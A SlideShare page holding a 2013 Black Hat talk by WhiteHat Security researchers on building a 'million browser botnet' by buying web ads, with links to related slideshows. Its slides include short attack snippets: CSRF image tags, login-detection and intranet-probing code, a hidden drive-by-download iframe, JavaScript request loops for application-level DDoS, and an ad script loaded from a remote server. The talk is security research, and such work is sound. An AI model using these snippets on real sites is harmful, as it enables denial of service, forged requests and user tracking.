SlideShare a Scribd company logo
1 of 50
Download to read offline
Million Browser Botnet
BLACK HAT USA 2013
JEREMIAH GROSSMAN
Founder and CTO
@jeremiahg
MATT JOHANSEN
Threat Research Center, Manager
@mattjay
About WhiteHat Security
§  Headquartered in Santa Clara, California
§  WhiteHat Sentinel: SaaS end-to-end website risk management
platform (static & dynamic vulnerability assessment)
§  Employees: 300+
© 2013 WhiteHat Security, Inc. 2
© 2013 WhiteHat Security, Inc. 3
BIO
Matt Johansen
•  Founder & CTO of WhiteHat Security
•  TED Alumni
•  InfoWorld Top 25 CTO
•  Co-founder of the WASC
•  Co-author: XSS Attacks
•  Former Yahoo! information security officer
•  Brazilian Jiu-Jitsu Black Belt
•  BlackHat, DEFCON, RSA Speaker
•  Oversees assessment of 15,000+ websites
•  Background in Penetration Testing
•  Hacker turned Management
•  I'm hiring… a lot…
Jeremiah Grossman
When visiting ANY web page…
…by nature of the way the Web works, it has near complete
control of your Web browser for as long as you are there.
§  Cross-Site Request Forgery (CSRF)
§  Cross-Site Scripting (XSS)
§  Clickjacking
§  … and various other browser tricks
Overview: HTML / Javascript “malware”
§  Browser Interrogation
§  Evil Cross-Site Request Forgery
§  Login-Detection
§  Deanonymization
§  Intranet Hacking
§  Auto Cross-Site Scripting
§  Drive-by-Download (Traditional Malware)
§  [Distributed] Brute-Force Hash Cracking
§  Application-Level DDoS
Browser interrogation
Auto-relay OS information, system settings, browser version,
installed plug-ins, geo-location, etc.
Evil CSRF (Javascript not necessarily required)
Force a browser to hack ANY other website, upload / download illegal content,
search for embarrassing or incriminating terms, initiate bank wire transfers,
post offensive messages, vote Edward Snowden as Times Person of the Year.
<img src="http://server/cart?id=‘ UNION ALL SELECT user, pass,…”>
<img src="http://torrent/D1C16AB1E2330AF3C4BE06AC43ABCE1CBD78C.torrent”>
<img src="http://www.google.com/search?q=Justin+Bieber+fan+club”>
<img src="http://att/search?uuid=10009”><img src="http://att/search?uuid=10010”>
<img src="http://server/vote?id=4”>
Spoofing Google search history with CSRF
http://jeremiahgrossman.blogspot.com/2010/12/spoofing-google-search-history-with.html
Login-Detection
<img src=”http://site/img.png” onload=”loggedin()”
onerror=”notloggedin()” />
<script src=”http://site/javascript.js” onload=”loggedin()”
onerror=”notloggedin()”></script>
I Know What Websites You Are Logged-In To
http://blog.whitehatsec.com/i-know-what-websites-you-are-logged-in-to-login-detection-via-csrf/
A least 6 different techniques
Deanonymize via mouse-click (clickjack)
I Know Your Name, and Probably a Whole Lot More
http://blog.whitehatsec.com/i-know-your-name-and-probably-a-whole-lot-more-deanonymization-via-likejacking-followjacking-etc/
Intranet Hacking
<iframe src=”http://192.168.1.1/” onload=”detection()”></iframe>
http://www.slideshare.net/jeremiahgrossman/hacking-intranet-websites-from-the-outside
Auto-XSS
<iframe src=“http://server/q=…<inject XSS payload>”></iframe>
§  Steal Cookies / Session Hijacking
§  Steal “saved” passwords.
§  Etc.
Traditional Malware (Drive-by-Downloads)
<iframe src="http: //lotmachinesguide .cn/ in.cgi?income56"
width=1 height=1 style="visibility: hidden"></iframe>
§  Exploits the browser and/or extensions (0-day fun)
§  A central way botnets are formed.
§  Patch, patch, patch! – uninstall Java
[Distributed] Brute-Force Hash Cracking
“During our tests it has been possible to observe password
guessing rates of 100,000 MD5 hashes/second in JavaScript.”
- Lavakumar Kuppan
md5-password-cracker.js by Feross Aboukhadijeh
http://feross.org/hacks/md5-password-cracker.js/
Ravan
http://www.andlabs.org/tools/ravan/ravan.html
Application-Level DDoS
“A browser can send a surprisingly large number of GET requests
to a remote website using COR from WebWorkers. During tests it
was found that around 10,000 requests/minute can be sent from a
single browser.”
- Lavakumar Kuppan
Attacking with HTML5
https://media.blackhat.com/bh-ad-10/Kuppan/Blackhat-AD-2010-Kuppan-Attacking-with-HTML5-wp.pdf
§  Does not hold open [a lot of] TCP connections, just
fires a lot HTTP request synchronously.
Connection-Limits (6-per hostname)
http://www.browserscope.org/
Connection-Limit Bypass
<script>
for (var i = 0; i < 300; i++) {
var img = new Image();
var url = ’http://target/?' + i;
img.src = url;
}
</script>
<script>
for (var i = 0; i < 300; i++) {
var img = new Image();
var url = 'ftp://localhost:80/?' + i;
img.src = url;
}
</script>
Apache Killer
[~300 connections]Limited to 6 connections
DEMO
Benefit of browser hacking this way…
§  No “malware” to detect, no “exploits,” no zero-days required.
§  No traces, few alarms. Prevent browser caching.
§  Everyone’s browser is vulnerable (by default).
§  Very, very easy.
§  The web is supposed to work this way.
Why Web Security Is Fundamentally Broken
http://www.slideshare.net/jeremiahgrossman/why-web-security-is-fundamentally-broken
Distribution of this type of “Javascript-malware”
§  A high trafficked website you own (blog, warez, pr0n, etc.)
§  HTML Injection on popular websites, forums etc. (XSS)
§  Man-in-the-Middle (WiFi)
§  [HTML] Email spam
§  Search Engine Poisoning
§  Compromise websites (mass SQL injection worms)
§  Third-Party Web Widgets (Weather, Counters, Trackers, etc.)
WE NEED TO THINK
BIGGER!
Third-Party Web Widget Security FAQ
http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html
Owning bad guys {and mafia} with javascript botnets
http://www.slideshare.net/chemai64/owning-bad-guys-and-mafia-with-javascript-botnets
“The most reliable, cost effective method
to inject evil code is to buy an ad.”
-Douglas Crockford
Advertisers
Advertising Networks
PublishersBlogs News
Social
Networks
Reviews
Visitors
Not An Advertising Network
Leverage Advertising Networks to…
§  Browser Interrogation
§  Evil Cross-Site Request Forgery
§  Login-Detection
§  User Deanonymization
§  Intranet Hacking
§  Auto Cross-Site Scripting
§  Drive-by-Download (Traditional Malware)
§  Cross-Domain Password Brute-Force
§  [Distributed] Brute-Force Hash Cracking
§  Application-Level DDoS
Cost-per-Click (CPC)
Cost-per-Thousand (CPM)
Price Range: $0.01 - $5.00 (USD)
Million Browser Botnet @ $0.15 (CPM) = $150 (USD)
Million Browser Botnet @ $0.50 (CPM) = $500 (USD)
Stolen credit cards anyone?
for (var i = 0; i < 10000; i++) {
var img = new Image();
var url = 'http://<amazon_aws>/iclick/id?' + i;
img.src = url;
}
In side the banner code, we pointed a script tag to:
http://ec2-23-20-141-160.compute-1.amazonaws.com/campaign.js
Then we could change the javascript payload to whatever,
whenever, without any approval process.
DEMO
We’re controlling someone else’s robots!
Advertising Network kicks into gear…
We did ecommerce at Black Hat.
http://www.net-security.org/secworld.php?id=15179
“[N]obody's breaking the web, dude.
Not now, not ever.”
Dan Kaminsky to Jeremiah Grossman,
December 21, 2010
CONTACT
THANK YOU
JEREMIAH GROSSMAN
Founder and CTO
Twitter: @jeremiahg
Email: jeremiah@whitehatsec.com
MATT JOHANSEN
Threat Research Center, Manager
Twitter: @mattjay
Email: matt@whitehatsec.com

More Related Content

What's hot

Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedThomas Roccia
 
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeBeefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeTop Draw Inc.
 
Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101v_raj
 
Man-In-The-Browser attacks
Man-In-The-Browser attacksMan-In-The-Browser attacks
Man-In-The-Browser attacksMário Almeida
 
Understanding CSRF
Understanding CSRFUnderstanding CSRF
Understanding CSRFPotato
 
Man in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactionsMan in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactionsDaveEdwards12
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)Jeremiah Grossman
 
Blackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareBlackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareJohn Bambenek
 
Information on Brute Force Attack
Information on Brute Force AttackInformation on Brute Force Attack
Information on Brute Force AttackHTS Hosting
 
How to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksHow to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksImperva
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesAvinash Sinha
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!CiNPA Security SIG
 
Cryptolocker Ransomware Attack
Cryptolocker Ransomware AttackCryptolocker Ransomware Attack
Cryptolocker Ransomware AttackKeval Bhogayata
 
How to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksHow to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksSolarwinds N-able
 

What's hot (20)

Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Wannacry
WannacryWannacry
Wannacry
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Wannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons LearnedWannacry | Technical Insight and Lessons Learned
Wannacry | Technical Insight and Lessons Learned
 
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeBeefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
 
Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101Cryptojacking - by Vishwaraj101
Cryptojacking - by Vishwaraj101
 
Man-In-The-Browser attacks
Man-In-The-Browser attacksMan-In-The-Browser attacks
Man-In-The-Browser attacks
 
Understanding CSRF
Understanding CSRFUnderstanding CSRF
Understanding CSRF
 
Man in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactionsMan in the Browser attacks on online banking transactions
Man in the Browser attacks on online banking transactions
 
WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)WhiteHat Security "Website Security Statistics Report" (Q1'09)
WhiteHat Security "Website Security Statistics Report" (Q1'09)
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
Blackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of RansomwareBlackhat USA 2014 - The New Scourge of Ransomware
Blackhat USA 2014 - The New Scourge of Ransomware
 
Information on Brute Force Attack
Information on Brute Force AttackInformation on Brute Force Attack
Information on Brute Force Attack
 
How to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksHow to Stop Man in the Browser Attacks
How to Stop Man in the Browser Attacks
 
Ransomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation TechniquesRansomware Trends 2017 & Mitigation Techniques
Ransomware Trends 2017 & Mitigation Techniques
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!
 
Cryptolocker Ransomware Attack
Cryptolocker Ransomware AttackCryptolocker Ransomware Attack
Cryptolocker Ransomware Attack
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Newbytes NullHyd
Newbytes NullHydNewbytes NullHyd
Newbytes NullHyd
 
How to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksHow to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware Attacks
 

Viewers also liked

Pertemuan 13-keamanan jaringan komputer
Pertemuan 13-keamanan jaringan komputerPertemuan 13-keamanan jaringan komputer
Pertemuan 13-keamanan jaringan komputerBahar Sobari
 
Introduction Mobile Apps
Introduction Mobile AppsIntroduction Mobile Apps
Introduction Mobile Appsmega_aprilia
 
Share Internet via Wi-Fi ke LAN
Share Internet via Wi-Fi ke LANShare Internet via Wi-Fi ke LAN
Share Internet via Wi-Fi ke LANFgroupIndonesia
 
Keamanan Jaringan - Pertemuan 2
Keamanan Jaringan - Pertemuan 2Keamanan Jaringan - Pertemuan 2
Keamanan Jaringan - Pertemuan 2Abrianto Nugraha
 
Hydra: A Vocabulary for Hypermedia-Driven Web APIs
Hydra: A Vocabulary for Hypermedia-Driven Web APIsHydra: A Vocabulary for Hypermedia-Driven Web APIs
Hydra: A Vocabulary for Hypermedia-Driven Web APIsMarkus Lanthaler
 
Model Your Application Domain, Not Your JSON Structures
Model Your Application Domain, Not Your JSON StructuresModel Your Application Domain, Not Your JSON Structures
Model Your Application Domain, Not Your JSON StructuresMarkus Lanthaler
 
CCNA 1 Routing and Switching v5.0 Chapter 4
CCNA 1 Routing and Switching v5.0 Chapter 4CCNA 1 Routing and Switching v5.0 Chapter 4
CCNA 1 Routing and Switching v5.0 Chapter 4Nil Menon
 
CCNA 1 Routing and Switching v5.0 Chapter 3
CCNA 1 Routing and Switching v5.0 Chapter 3CCNA 1 Routing and Switching v5.0 Chapter 3
CCNA 1 Routing and Switching v5.0 Chapter 3Nil Menon
 
CCNA 1 Routing and Switching v5.0 Chapter 9
CCNA 1 Routing and Switching v5.0 Chapter 9CCNA 1 Routing and Switching v5.0 Chapter 9
CCNA 1 Routing and Switching v5.0 Chapter 9Nil Menon
 
CCNA 1 Routing and Switching v5.0 Chapter 2
CCNA 1 Routing and Switching v5.0 Chapter 2CCNA 1 Routing and Switching v5.0 Chapter 2
CCNA 1 Routing and Switching v5.0 Chapter 2Nil Menon
 

Viewers also liked (13)

Pertemuan 13-keamanan jaringan komputer
Pertemuan 13-keamanan jaringan komputerPertemuan 13-keamanan jaringan komputer
Pertemuan 13-keamanan jaringan komputer
 
Introduction Mobile Apps
Introduction Mobile AppsIntroduction Mobile Apps
Introduction Mobile Apps
 
Share Internet via Wi-Fi ke LAN
Share Internet via Wi-Fi ke LANShare Internet via Wi-Fi ke LAN
Share Internet via Wi-Fi ke LAN
 
Chapter 5 firewall
Chapter 5 firewallChapter 5 firewall
Chapter 5 firewall
 
Keamanan Jaringan - Pertemuan 2
Keamanan Jaringan - Pertemuan 2Keamanan Jaringan - Pertemuan 2
Keamanan Jaringan - Pertemuan 2
 
Hydra: A Vocabulary for Hypermedia-Driven Web APIs
Hydra: A Vocabulary for Hypermedia-Driven Web APIsHydra: A Vocabulary for Hypermedia-Driven Web APIs
Hydra: A Vocabulary for Hypermedia-Driven Web APIs
 
Model Your Application Domain, Not Your JSON Structures
Model Your Application Domain, Not Your JSON StructuresModel Your Application Domain, Not Your JSON Structures
Model Your Application Domain, Not Your JSON Structures
 
CCNA 1 Routing and Switching v5.0 Chapter 4
CCNA 1 Routing and Switching v5.0 Chapter 4CCNA 1 Routing and Switching v5.0 Chapter 4
CCNA 1 Routing and Switching v5.0 Chapter 4
 
CCNA 1 Routing and Switching v5.0 Chapter 3
CCNA 1 Routing and Switching v5.0 Chapter 3CCNA 1 Routing and Switching v5.0 Chapter 3
CCNA 1 Routing and Switching v5.0 Chapter 3
 
CCNA 1 Routing and Switching v5.0 Chapter 9
CCNA 1 Routing and Switching v5.0 Chapter 9CCNA 1 Routing and Switching v5.0 Chapter 9
CCNA 1 Routing and Switching v5.0 Chapter 9
 
CCNA 1 Routing and Switching v5.0 Chapter 2
CCNA 1 Routing and Switching v5.0 Chapter 2CCNA 1 Routing and Switching v5.0 Chapter 2
CCNA 1 Routing and Switching v5.0 Chapter 2
 
Ip address and subnetting
Ip address and subnettingIp address and subnetting
Ip address and subnetting
 
Death by PowerPoint
Death by PowerPointDeath by PowerPoint
Death by PowerPoint
 

Similar to Million Browser Botnet

Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossmanguestdb261a
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBSides Delhi
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security TopicsShawn Gorrell
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scriptinggmaran23
 
Introduction to Web Server Security
Introduction to Web Server SecurityIntroduction to Web Server Security
Introduction to Web Server SecurityJITENDRA KUMAR PATEL
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)Shubham Gupta
 
Online Security and Privacy Issues
Online Security and Privacy IssuesOnline Security and Privacy Issues
Online Security and Privacy Issuesebusinessmantra
 
Talesh Seeparsan - The Hound of the Malwarevilles
Talesh Seeparsan - The Hound of the MalwarevillesTalesh Seeparsan - The Hound of the Malwarevilles
Talesh Seeparsan - The Hound of the MalwarevillesMeet Magento Italy
 
Staying Safe on the Computer and Online
Staying Safe on the Computer and OnlineStaying Safe on the Computer and Online
Staying Safe on the Computer and Onlinecat509
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Francois Marier
 
Adversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-myAdversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-myJesse Moore
 

Similar to Million Browser Botnet (20)

Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
CSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_GrossmanCSRF_RSA_2008_Jeremiah_Grossman
CSRF_RSA_2008_Jeremiah_Grossman
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Attacking Web Proxies
Attacking Web ProxiesAttacking Web Proxies
Attacking Web Proxies
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
BsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security PlaygroundBsidesDelhi 2018: DomGoat - the DOM Security Playground
BsidesDelhi 2018: DomGoat - the DOM Security Playground
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
 
Devouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
 
Introduction to Web Server Security
Introduction to Web Server SecurityIntroduction to Web Server Security
Introduction to Web Server Security
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
 
Online Security and Privacy Issues
Online Security and Privacy IssuesOnline Security and Privacy Issues
Online Security and Privacy Issues
 
Talesh Seeparsan - The Hound of the Malwarevilles
Talesh Seeparsan - The Hound of the MalwarevillesTalesh Seeparsan - The Hound of the Malwarevilles
Talesh Seeparsan - The Hound of the Malwarevilles
 
Staying Safe on the Computer and Online
Staying Safe on the Computer and OnlineStaying Safe on the Computer and Online
Staying Safe on the Computer and Online
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
 
Adversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-myAdversary tactics config mgmt-&amp;-logs-oh-my
Adversary tactics config mgmt-&amp;-logs-oh-my
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]Jeremiah Grossman
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Jeremiah Grossman
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
WhiteHat’s 12th Website Security Statistics [Full Report]
